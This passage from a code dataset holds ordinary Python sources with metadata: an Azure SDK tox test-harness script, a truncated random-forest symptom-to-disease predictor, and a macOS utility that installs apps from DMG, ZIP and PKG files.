{}\".format(package_dir)\n )\n with open(file, \"r\") as f:\n for line in f:\n try:\n parsed_req = [req for req in parse_requirements(line)]\n except RequirementParseError as e:\n parsed_req = [None]\n req_lines.append((line, parsed_req))\n\n if req_lines:\n all_adjustments = injected_packages + [\n line_tuple[0].strip()\n for line_tuple in req_lines\n if line_tuple[0].strip()\n and not compare_req_to_injected_reqs(\n line_tuple[1][0], injected_packages\n )\n ]\n else:\n all_adjustments = injected_packages\n\n with open(file, \"w\") as f:\n # note that we directly use '\\n' here instead of os.linesep due to how f.write() actually handles this stuff internally\n # If a file is opened in text mode (the default), during write python will accidentally double replace due to \"\\r\" being\n # replaced with \"\\r\\n\" on Windows. Result: \"\\r\\n\\n\". Extra line breaks!\n f.write(\"\\n\".join(all_adjustments))\n\n\ndef build_whl_for_req(req, package_path):\n if \"..\" in req:\n # Create temp path if it doesn't exist\n temp_dir = os.path.join(package_path, \".tmp_whl_dir\")\n if not os.path.exists(temp_dir):\n os.mkdir(temp_dir)\n\n req_pkg_path = os.path.abspath(os.path.join(package_path, req.replace(\"\\n\", \"\")))\n pkg_name, version, _, _ = parse_setup(req_pkg_path)\n logging.info(\"Building wheel for package {}\".format(pkg_name))\n run_check_call([sys.executable, \"setup.py\", \"bdist_wheel\", \"-d\", temp_dir], req_pkg_path)\n\n whl_path = os.path.join(temp_dir, find_whl(pkg_name, version, temp_dir))\n logging.info(\"Wheel for package {0} is {1}\".format(pkg_name, whl_path))\n logging.info(\"Replacing dev requirement. 
Old requirement:{0}, New requirement:{1}\".format(req, whl_path))\n return whl_path\n else:\n return req\n\ndef replace_dev_reqs(file, pkg_root):\n adjusted_req_lines = []\n\n with open(file, \"r\") as f:\n for line in f:\n args = [\n part.strip()\n for part in line.split()\n if part and not part.strip() == \"-e\"\n ]\n amended_line = \" \".join(args)\n adjusted_req_lines.append(amended_line)\n\n req_file_name = os.path.basename(file)\n logging.info(\"Old {0}:{1}\".format(req_file_name, adjusted_req_lines))\n\n adjusted_req_lines = list(map(lambda x: build_whl_for_req(x, pkg_root), adjusted_req_lines))\n logging.info(\"New {0}:{1}\".format(req_file_name, adjusted_req_lines))\n\n with open(file, \"w\") as f:\n # note that we directly use '\\n' here instead of os.linesep due to how f.write() actually handles this stuff internally\n # If a file is opened in text mode (the default), during write python will accidentally double replace due to \"\\r\" being\n # replaced with \"\\r\\n\" on Windows. Result: \"\\r\\n\\n\". Extra line breaks!\n f.write(\"\\n\".join(adjusted_req_lines))\n\n\ndef collect_log_files(working_dir):\n logging.info(\"Collecting log files from {}\".format(working_dir))\n package = working_dir.split('/')[-1]\n # collect all the log files into one place for publishing in case of tox failure\n\n log_directory = os.path.join(\n root_dir, \"_tox_logs\"\n )\n\n try:\n os.mkdir(log_directory)\n logging.info(\"Created log directory: {}\".format(log_directory))\n except OSError:\n logging.info(\"'{}' directory already exists\".format(log_directory))\n\n log_directory = os.path.join(\n log_directory, package\n )\n\n try:\n os.mkdir(log_directory)\n logging.info(\"Created log directory: {}\".format(log_directory))\n except OSError:\n logging.info(\"'{}' directory already exists\".format(log_directory))\n\n log_directory = os.path.join(\n log_directory, sys.version.split()[0]\n )\n\n try:\n os.mkdir(log_directory)\n logging.info(\"Created log directory: {}\".format(log_directory))\n except OSError:\n logging.info(\"'{}' directory already exists\".format(log_directory))\n\n for test_env in glob.glob(os.path.join(working_dir, \".tox\", \"*\")):\n env = os.path.split(test_env)[-1]\n logging.info(\"env: {}\".format(env))\n log_files = os.path.join(test_env, \"log\")\n\n if os.path.exists(log_files):\n logging.info(\"Copying log files from {} to {}\".format(log_files, log_directory))\n\n temp_dir = os.path.join(log_directory, env)\n logging.info(\"TEMP DIR: {}\".format(temp_dir))\n try:\n os.mkdir(temp_dir)\n logging.info(\"Created log directory: {}\".format(temp_dir))\n except OSError:\n logging.info(\"Could not create '{}' directory\".format(temp_dir))\n break\n\n for filename in os.listdir(log_files):\n if filename.endswith(\".log\"):\n logging.info(\"LOG FILE: {}\".format(filename))\n\n file_location = os.path.join(log_files, filename)\n shutil.move(\n file_location,\n os.path.join(temp_dir, filename)\n )\n logging.info(\"Moved file to {}\".format(os.path.join(temp_dir, filename)))\n else:\n logging.info(\"Could not find {} directory\".format(log_files))\n\n for f in glob.glob(os.path.join(root_dir, \"_tox_logs\", \"*\")):\n logging.info(\"Log file: {}\".format(f))\n\n\ndef execute_tox_serial(tox_command_tuples):\n return_code = 0\n\n for index, cmd_tuple in enumerate(tox_command_tuples):\n tox_dir = os.path.abspath(os.path.join(cmd_tuple[1], \"./.tox/\"))\n logging.info(\"tox_dir: {}\".format(tox_dir))\n\n logging.info(\n \"Running tox for {}. 
{} of {}.\".format(\n os.path.basename(cmd_tuple[1]), index + 1, len(tox_command_tuples)\n )\n )\n\n result = run_check_call(cmd_tuple[0], cmd_tuple[1], always_exit=False)\n\n if result is not None and result != 0:\n return_code = result\n\n if in_ci():\n collect_log_files(cmd_tuple[1])\n shutil.rmtree(tox_dir)\n\n return return_code\n\n\ndef prep_and_run_tox(targeted_packages, parsed_args, options_array=[]):\n if parsed_args.wheel_dir:\n os.environ[\"PREBUILT_WHEEL_DIR\"] = parsed_args.wheel_dir\n\n if parsed_args.mark_arg:\n options_array.extend([\"-m\", \"{}\".format(parsed_args.mark_arg)])\n\n tox_command_tuples = []\n\n for index, package_dir in enumerate(targeted_packages):\n destination_tox_ini = os.path.join(package_dir, \"tox.ini\")\n destination_dev_req = os.path.join(package_dir, \"dev_requirements.txt\")\n\n tox_execution_array = [sys.executable, \"-m\", \"tox\"]\n\n local_options_array = options_array[:]\n\n # Get code coverage params for current package\n package_name = os.path.basename(package_dir)\n coverage_commands = create_code_coverage_params(parsed_args, package_name)\n local_options_array.extend(coverage_commands)\n\n pkg_egg_info_name = \"{}.egg-info\".format(package_name.replace(\"-\", \"_\"))\n local_options_array.extend([\"--ignore\", pkg_egg_info_name])\n\n # if we are targeting only packages that are management plane, it is a possibility\n # that no tests running is an acceptable situation\n # we explicitly handle this here.\n if is_error_code_5_allowed(package_dir, package_name):\n local_options_array.append(\"--suppress-no-test-exit-code\")\n\n # if not present, re-use base\n if not os.path.exists(destination_tox_ini) or (\n os.path.exists(destination_tox_ini)\n and os.path.basename(package_dir) in IGNORED_TOX_INIS\n ):\n logging.info(\n \"No customized tox.ini present, using common eng/tox/tox.ini for {}\".format(\n os.path.basename(package_dir)\n )\n )\n tox_execution_array.extend([\"-c\", DEFAULT_TOX_INI_LOCATION])\n\n # handle empty file\n if not os.path.exists(destination_dev_req):\n logging.info(\"No dev_requirements present.\")\n with open(destination_dev_req, \"w+\") as file:\n file.write(\"\\n\")\n\n if in_ci():\n replace_dev_reqs(destination_dev_req, package_dir)\n replace_dev_reqs(test_tools_path, package_dir)\n replace_dev_reqs(dependency_tools_path, package_dir)\n os.environ[\"TOX_PARALLEL_NO_SPINNER\"] = \"1\"\n\n inject_custom_reqs(\n destination_dev_req, parsed_args.injected_packages, package_dir\n )\n\n if parsed_args.tox_env:\n tox_execution_array.extend([\"-e\", parsed_args.tox_env])\n\n if parsed_args.tenvparallel:\n tox_execution_array.extend([\"-p\", \"all\"])\n\n if local_options_array:\n tox_execution_array.extend([\"--\"] + local_options_array)\n\n tox_command_tuples.append((tox_execution_array, package_dir))\n\n if parsed_args.tparallel:\n return_code = execute_tox_parallel(tox_command_tuples)\n else:\n return_code = execute_tox_serial(tox_command_tuples)\n\n if not parsed_args.disablecov:\n collect_tox_coverage_files(targeted_packages)\n\n sys.exit(return_code)", "repo_name": "mirespace/python-azure", "sub_path": "scripts/devops_tasks/tox_harness.py", "file_name": "tox_harness.py", "file_ext": "py", "file_size_in_byte": 15912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.version_info", "line_number": 9, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.INFO", 
"line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 49, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 51, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 51, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 62, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 68, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 98, "usage_type": "attribute"}, {"api_name": "common_tasks.run_check_call", "line_number": 102, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "common_tasks.clean_coverage", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": 
"attribute"}, {"api_name": "os.path.join", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 136, "usage_type": "call"}, {"api_name": "os.environ.copy", "line_number": 141, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 141, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 144, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 150, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 152, "usage_type": "call"}, {"api_name": "common_tasks.read_file", "line_number": 158, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 159, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 165, "usage_type": "call"}, {"api_name": "common_tasks.log_file", "line_number": 179, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "re.split", "line_number": 201, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 204, "usage_type": "call"}, {"api_name": "pkg_resources.parse_requirements", "line_number": 210, "usage_type": "call"}, {"api_name": "pkg_resources.RequirementParseError", "line_number": 211, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 237, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 238, "usage_type": "call"}, {"api_name": "os.path", "line_number": 238, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 241, "usage_type": "call"}, {"api_name": "common_tasks.parse_setup", "line_number": 242, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 243, "usage_type": "call"}, {"api_name": "common_tasks.run_check_call", "line_number": 244, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 244, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "attribute"}, {"api_name": "common_tasks.find_whl", "line_number": 246, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 247, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 266, "usage_type": "call"}, {"api_name": "os.path", "line_number": 266, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 267, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 270, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 284, "usage_type": "call"}, {"api_name": "os.path", "line_number": 284, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 289, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 290, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 294, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 299, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 300, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 304, "usage_type": "call"}, {"api_name": "os.path", "line_number": 304, "usage_type": "attribute"}, {"api_name": "sys.version.split", "line_number": 305, "usage_type": "call"}, {"api_name": "sys.version", "line_number": 305, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 309, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 310, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 312, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path", "line_number": 314, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 315, "usage_type": "call"}, {"api_name": "os.path", "line_number": 315, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 316, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 317, "usage_type": "call"}, {"api_name": "os.path", "line_number": 317, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 319, "usage_type": "call"}, {"api_name": "os.path", "line_number": 319, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 323, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 325, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 326, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 328, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 331, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 333, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path", "line_number": 338, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path", "line_number": 340, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 342, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path", "line_number": 344, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 352, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 353, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 355, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path", "line_number": 357, 
"usage_type": "attribute"}, {"api_name": "common_tasks.run_check_call", "line_number": 361, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 368, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 375, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 383, "usage_type": "call"}, {"api_name": "os.path", "line_number": 383, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 384, "usage_type": "call"}, {"api_name": "os.path", "line_number": 384, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 386, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 391, "usage_type": "call"}, {"api_name": "os.path", "line_number": 391, "usage_type": "attribute"}, {"api_name": "common_tasks.create_code_coverage_params", "line_number": 392, "usage_type": "call"}, {"api_name": "common_tasks.is_error_code_5_allowed", "line_number": 401, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path", "line_number": 405, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 406, "usage_type": "call"}, {"api_name": "os.path", "line_number": 406, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path", "line_number": 407, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 411, "usage_type": "call"}, {"api_name": "os.path", "line_number": 411, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 417, "usage_type": "call"}, {"api_name": "os.path", "line_number": 417, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 418, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 426, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 451, "usage_type": "call"}]}
+{"seq_id": "2500931251", "text": "import pandas as pd\nimport numpy as np\nimport pickle\nimport os\nfrom joblib import dump,load\nfrom scripts.disease_to_symptoms import D2S\nfrom sklearn.ensemble import RandomForestClassifier\n\nclass S2D:\n def __init__(self,ROOT_DIR,mode=\"train\"):\n self.ROOT_DIR=ROOT_DIR\n if mode==\"train\":\n self.load_data()\n self.model=RandomForestClassifier(300,n_jobs=-1)\n else:\n self.model=load(os.path.join(self.ROOT_DIR,'models/custom/S2D.joblib'))\n self.diseases,self.symptoms_list=pickle.load(open(os.path.join(self.ROOT_DIR,'models/custom/S2D.b'),'rb'))\n def load_data(self):\n self.data=pd.read_csv(os.path.join(self.ROOT_DIR,'datasets/preprocessed/df_pivoted.csv'))\n def train(self):\n self.symptoms_list=self.data.columns[2:]\n self.diseases=self.data['Source']\n symptoms=self.data.iloc[:,2:]\n self.model.fit(symptoms,self.diseases)\n self.store_params()\n def predict(self,symptoms):\n self.symptoms=symptoms\n symptom_vector=np.zeros(self.symptoms_list.size)\n for s in symptoms:\n symptom_vector[self.symptoms_list.get_loc(s)]=1\n probabilities=self.model.predict_proba([symptom_vector])\n predictions=sorted(zip(probabilities[0],self.diseases),reverse=True)\n predicted_diseases=[]\n i=0\n while len(predicted_diseases)!=3 and i\\n%(message)s\\n'\n)\nformatter_sl = logging.Formatter(\n '%(name)s: %(levelname)s %(message)s'\n)\n\nsyslog = logging.handlers.SysLogHandler(address=\"/var/run/syslog\")\nsyslog.setLevel(logging.WARNING)\nsyslog.setFormatter(formatter_sl)\nlogger.addHandler(syslog)\n#\n# console = logging.StreamHandler()\n# console.setLevel(logging.DEBUG)\n# console.setFormatter(formatter_ch)\n# logger.addHandler(console)\n\n\ndef mount_dmg(dmg, unmount=False):\n \"\"\" (Un)Mounts given DMG at /Volumes/NAME \"\"\"\n\n # Generate Mountpoint\n mount_point = os.path.join('/Volumes/',\n os.path.splitext(os.path.basename(dmg))[0])\n\n # Mount dmg\n dnull = open('/dev/null', 'w')\n if unmount:\n logger.info(\"Unmounted %s\")\n return_code = subprocess.call([\n 'hdiutil',\n 'detach',\n mount_point\n ], stdout=dnull)\n else:\n logger.info(\"Mounted %s at %s\" % (dmg, mount_point))\n return_code = subprocess.call([\n 'hdiutil',\n 'attach',\n '-mountpoint',\n mount_point,\n dmg\n ], stdout=dnull)\n\n # Minimal Error Handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n return mount_point\n\n\nclass NoApplicationException(Exception):\n pass\n\n\nclass NotInstalledException(Exception):\n pass\n\n\nclass Installable(object):\n \"\"\"\n Specifices an installable object.\n \"\"\"\n\n #: List of Acceptable Types\n TYPES = [\n '.dmg',\n '.zip',\n '.pkg',\n '.app',\n '.alfredworkflow',\n ]\n\n #: List of Search Paths\n PATHS = [\n '~/Downloads/',\n # '~/Desktop/',\n ]\n\n def __init__(self, path, types=TYPES):\n \"\"\"\n Creates new Instance of Installable from path.\n\n During initialization, zipfiles are inspected to find any possible\n Installable inside them.\n\n Args:\n path: Object to reference in this Instance\n REQUIRED\n types: Types which to accept in path. Needs to be a subset of TYPES\n Defaults to TYPES\n\n Raises:\n NoApplicationException: is raised when the type of 'path' is not in\n TYPES, i.e. 
not recognized.\n This is also true if type is '.zip', but this '.zip' does not\n contain any valid Installables.\n \"\"\"\n path = path.rstrip('/')\n ext = os.path.splitext(path)[1]\n\n # Check if path is a valid File\n if ext not in types:\n logger.debug(\"%s is no valid Installable object.\" % path)\n raise NoApplicationException()\n\n # Special Zip Treatment\n # Only accept zips, if they include a valid type\n # Inside zips, ignore .zips and .dmgs\n inzip = []\n\n if ext == '.zip':\n _types = list(types)\n _types.remove('.zip')\n _types.remove('.dmg')\n\n zf = zipfile.ZipFile(path, 'r')\n\n for f in zf.namelist():\n if f.startswith(\"__MACOSX/\"):\n continue\n\n t = os.path.splitext(f.rstrip('/'))[1]\n if t in _types and f.count(t+'/') == 1:\n logger.info(\"Found Installable %s inside %s\" % (f, path))\n inzip.append(f.split('.app/', 1)[0]+'.app/')\n\n if not inzip:\n logger.debug(\"No Installables in %s\" % path)\n raise NoApplicationException()\n\n self.inzip = set(inzip)\n self.path = path\n self.ext = ext\n\n def _install_app(self, prefix, overrite=False, remove=False):\n dest = os.path.join(prefix, os.path.basename(self.path))\n if os.path.exists(dest):\n if overrite:\n logger.debug(\"Trying to remove %s\" % (dest))\n send2trash.send2trash(dest)\n logger.info(\"Moved %s to trash.\" % dest)\n else:\n logger.error(\"File exists: %s\" % dest)\n raise OSError(17, \"File exists\", dest)\n\n logger.debug(\n \"Installing: %s\" % os.path.basename(self.path))\n return_code = subprocess.call(\n ['/bin/cp', '-a', self.path, prefix])\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n logger.info(\"Installed %s to %s\" % (self, prefix))\n\n def _install_zip(self, prefix, overrite=False, remove=False):\n tmp = tempfile.gettempdir()\n\n return_code = subprocess.call(\n ['unzip', '-u', '-o', self.path, '-d', tmp]\n )\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n for f in self.inzip:\n a = Installable(os.path.join(tmp, f))\n a.install(prefix, overrite=overrite)\n\n def _install_dmg(self, prefix, overrite=False, remove=False):\n where = mount_dmg(self.path)\n\n apps = self.get_installables(path=where)\n for app in apps:\n app.install(prefix, overrite=overrite)\n\n mount_dmg(self.path, unmount=True)\n\n def _install_pkg(self, prefix=None, overrite=False, remove=False):\n return_code = subprocess.call(['open', '-W', self.path])\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n def _install_alfredworkflow(self, prefix=\"/\",\n overrite=False, remove=False):\n if remove:\n tmp = tempfile.gettempdir()\n\n return_code = subprocess.call(\n ['/bin/cp', '-a', self.path, tmp])\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n path = os.path.join(tmp, os.path.basename(self.path))\n else:\n path = self.path\n\n return_code = subprocess.call(\n ['open', path]\n )\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n def install(self, prefix='/Applications/', remove=False, overrite=False):\n \"\"\"\n Installs the Applications referenced by this Instance.\n\n This method is 
mainly a wrapper around type-specific install functions.\n\n        Args:\n            prefix: Path to where Applications ('.app') shall be installed.\n                Defaults to '/Applications/'.\n                Note: This prefix will only be used for ('.app')-Files and\n                ignored otherwise.\n            remove: Boolean. If set to 'True', method will try to remove\n                Object after successful installation.\n                Defaults to 'False'\n            overrite: Boolean. If set to 'True', will overwrite existing Apps at\n                path.\n                Defaults to 'False'\n\n        Returns:\n            Original Path of the referenced object on success, None otherwise.\n\n        Raises:\n            OSError: is raised on several occasions, when installation failed.\n                This can for example happen, when you don't have permissions at\n                path.\n        \"\"\"\n\n        logger.debug(\n            \"Trying to install %s to %s with remove %s and overrite %s\" %\n            (self.path, prefix, remove, overrite))\n        try:\n            if self.removed:\n                logger.warning(\"%s has been removed!\" % self)\n                return None\n        except AttributeError:\n            pass\n\n        getattr(self, \"_install\" + self.ext.replace('.', \"_\"))(\n            prefix=prefix,\n            overrite=overrite,\n            remove=remove,\n        )\n        logger.info(\"Installed %s to %s\" % (self, prefix))\n\n        self.installed = True\n\n        if remove:\n            self.remove()\n\n        return self.path\n\n    def remove(self, force=False):\n        \"\"\"\n        Removes the Container of Applications (dmgs, zips, pkgs).\n\n        This method can only be called after install() has run successfully.\n\n        Args:\n            force: If set, Installable will be removed even if it has not been\n                installed. Defaults to 'False'\n\n        Raises:\n            NotInstalledException: If Installable().install has not been called\n                successfully and force is 'False'\n        \"\"\"\n\n        if not getattr(self, \"installed\", False) and not force:\n            logger.debug(\"Can't remove %s!\" % self)\n            raise NotInstalledException()\n\n        try:\n            send2trash.send2trash(self.path)\n            self.removed = True\n            logger.info(\"Moved %s to trash.\" % self)\n        except OSError as ose:\n            logger.exception(ose)\n\n    def __len__(self):\n        \"\"\"returns number of installable objects\"\"\"\n        return 1 if len(self.inzip) == 0 else len(self.inzip)\n\n    def __repr__(self):\n        \"\"\"gives a representation of the instance\"\"\"\n        return \"<\" + self.__class__.__name__ + \": \" + str(self) + \">\"\n\n    def __str__(self):\n        \"\"\"returns __unicode__\"\"\"\n        return unicode(self).encode('utf-8')\n\n    def __unicode__(self):\n        \"\"\"gives the basename of the referenced installable object\"\"\"\n        return os.path.basename(self.path)\n\n    # Static Methods\n    @staticmethod\n    def get_installables(paths=PATHS, types=TYPES):\n        \"\"\"\n        Finds installable objects\n\n        Args:\n            paths: List of Path in which to look for installable objects.\n                Defaults to Installable.PATHS\n            types: List of Types to recognize as installable objects. Must be\n                a subset of Installable.TYPES. 
Defaults to Installable.TYPES\n\n Returns:\n a List of Installable() objects.\n \"\"\"\n\n inst = []\n\n for p in paths:\n p = os.path.expanduser(p)\n for f in os.listdir(p):\n try:\n i = Installable(os.path.join(p, f), types=types)\n logger.info(\"Found Installable at '%s'\" % i.path)\n inst.append(i)\n except NoApplicationException:\n logger.log(logging.NOTSET, \"No valid Installable at %s\")\n\n return inst\n", "repo_name": "fgr0/dmginstall", "sub_path": "install.py", "file_name": "install.py", "file_ext": "py", "file_size_in_byte": 11609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.handlers.SysLogHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 42, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 57, "usage_type": "name"}, {"api_name": "os.path.path.splitext", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 58, "usage_type": "name"}, {"api_name": "os.path.path.basename", "line_number": 58, "usage_type": "call"}, {"api_name": 